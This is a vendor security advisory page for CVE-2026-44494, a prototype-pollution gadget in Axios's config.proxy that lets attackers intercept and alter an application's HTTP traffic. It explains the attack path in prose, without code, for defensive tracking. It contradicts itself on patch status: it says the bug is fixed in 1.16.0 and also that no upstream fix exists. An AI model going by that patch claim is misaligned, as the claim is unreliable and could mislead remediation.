How is CVE-2026-44494 exploited?

Network reachability (required): The vulnerability is exploited over the network; the attacker must be able to deliver prototype pollution into the target application's runtime and have network-level visibility to act as a proxy endpoint. Authentication (not-required): No credentials or account are needed; the attacker does not need to authenticate to the target service to exploit this vulnerability. Victim interaction (not-required): No user action is required; exploitation occurs entirely within the server-side Node.js process when Axios resolves config.proxy through the prototype chain. Attack complexity (info): Attack complexity is rated High because exploitation requires a pre-existing prototype pollution condition elsewhere in the dependency tree, plus timing or positioning to intercept traffic, rather than a single self-contained step.

What is the impact of CVE-2026-44494?

The attacker intercepts all outbound HTTP requests made by the affected application, reading authentication tokens, API keys, and session credentials in transit. The attacker modifies HTTP request and response bodies in flight, allowing injection of malicious payloads into data the application trusts and acts on. Any downstream service the application communicates with is reachable through the forged proxy, expanding the attacker's foothold beyond the initially compromised process.

Back to search

HIGHCVE-2026-44494Published 2026-06-11Modified 2026-06-13CNA GitHub_M

CVE-2026-44494: Axios: Full Man-in-the-Middle via Prototype Pollution Gadget in `config.proxy`

Q: Is CVE-2026-44494 patched?

Because no fix version has been published upstream yet, HarborGuard re-evaluates this advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment an upstream release ships. For customers with auto-remediation enabled, the rebuild, regression-test run, and PR against affected workloads will be triggered without any manual intervention required.

Axios is a promise based HTTP client for the browser and Node.js. From 1.0.0 to before 1.16.0, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution in the application's dependency tree to be escalated into a full Man-in-the-Middle (MITM) attack — intercepting, reading, and modifying all HTTP traffic including authentication credentials. The HTTP adapter at lib/adapters/http.js:670 reads config.proxy via standard property access, which traverses the prototype chain. Because proxy is not present in Axios defaults, the merged config object has no own proxy property, making it trivially injectable via prototype pollution. Once injected, setProxy() routes all HTTP requests through the attacker's proxy server. This vulnerability is fixed in 1.16.0.

CVSS v3.1: 8.7
Severity: HIGH
Fixed in: —
Affected Products: 1

HarborGuard Analysis

Synopsis

A prototype pollution gadget vulnerability in the Axios HTTP client library (versions 1.0.0 through before 1.16.0) allows an attacker to escalate any existing prototype pollution in the application's dependency tree into a full man-in-the-middle (MITM) attack. The vulnerability is reachable over the network with no authentication required, and the attack targets the config.proxy property resolution path in Axios's HTTP adapter. Successful exploitation gives an attacker full read and write access to all HTTP traffic the affected application sends, including authentication credentials. HarborGuard tracks this advisory and will make a patched-image rebuild available the moment an upstream fix version is published.

HarborGuard Coverage

Detection

Detection for CVE-2026-44494 is available across every HarborGuard environment: the CVE is ingested from upstream advisory feeds within minutes of publication and matched against all customer images, including custom-built Node.js application images that bundle an affected Axios version in their dependency tree. Any image containing axios in the range >=1.0.0 and <1.16.0 is flagged automatically.

Available

Triage

HarborGuard is capable of scoring this finding at CVSS 8.7 HIGH and weighting it against each environment's compliance policy to reflect the severity accurately. Routed findings land in the appropriate team inbox within each customer organization based on image ownership and policy configuration.

Available

Patch

Because no fix version has been published upstream yet, HarborGuard re-evaluates this advisory on every ingest cycle and will make a patched-image rebuild available automatically the moment an upstream release ships. For customers with auto-remediation enabled, the rebuild, regression-test run, and PR against affected workloads will be triggered without any manual intervention required.

Pending upstream

Exploit Conditions

Network reachabilityRequired
The vulnerability is exploited over the network; the attacker must be able to deliver prototype pollution into the target application's runtime and have network-level visibility to act as a proxy endpoint.
AuthenticationNot required
No credentials or account are needed; the attacker does not need to authenticate to the target service to exploit this vulnerability.
Victim interactionNot required
No user action is required; exploitation occurs entirely within the server-side Node.js process when Axios resolves config.proxy through the prototype chain.
Attack complexityDetail
Attack complexity is rated High because exploitation requires a pre-existing prototype pollution condition elsewhere in the dependency tree, plus timing or positioning to intercept traffic, rather than a single self-contained step.

Blast Radius

The attacker intercepts all outbound HTTP requests made by the affected application, reading authentication tokens, API keys, and session credentials in transit.
The attacker modifies HTTP request and response bodies in flight, allowing injection of malicious payloads into data the application trusts and acts on.
Any downstream service the application communicates with is reachable through the forged proxy, expanding the attacker's foothold beyond the initially compromised process.

How HarborGuard Handles This

Available on HarborGuard: this CVE is actively tracked and any image containing axios >=1.0.0 and <1.16.0 is flagged on every scan, including images rebuilt from internal Dockerfiles that install dependencies via npm or yarn. Because no upstream fix version exists yet, HarborGuard re-checks the advisory on each ingest cycle and will make a patched-image rebuild available automatically once axios ships a remediated release. In the interim, customers can apply compensating controls through HarborGuard policy: network-egress filtering rules can block unauthorized outbound proxy destinations, and workloads running affected images can be isolated via network policy to limit the blast radius of a successful MITM escalation. For customers with auto-remediation enabled, the full rebuild, regression-test, and PR workflow will trigger without manual action the moment the upstream patch is available.

See how HarborGuard automates this

Affected packages

axios / axios
>= 1.0.0, < 1.16.0

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

References

https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh

Metrics

Get notified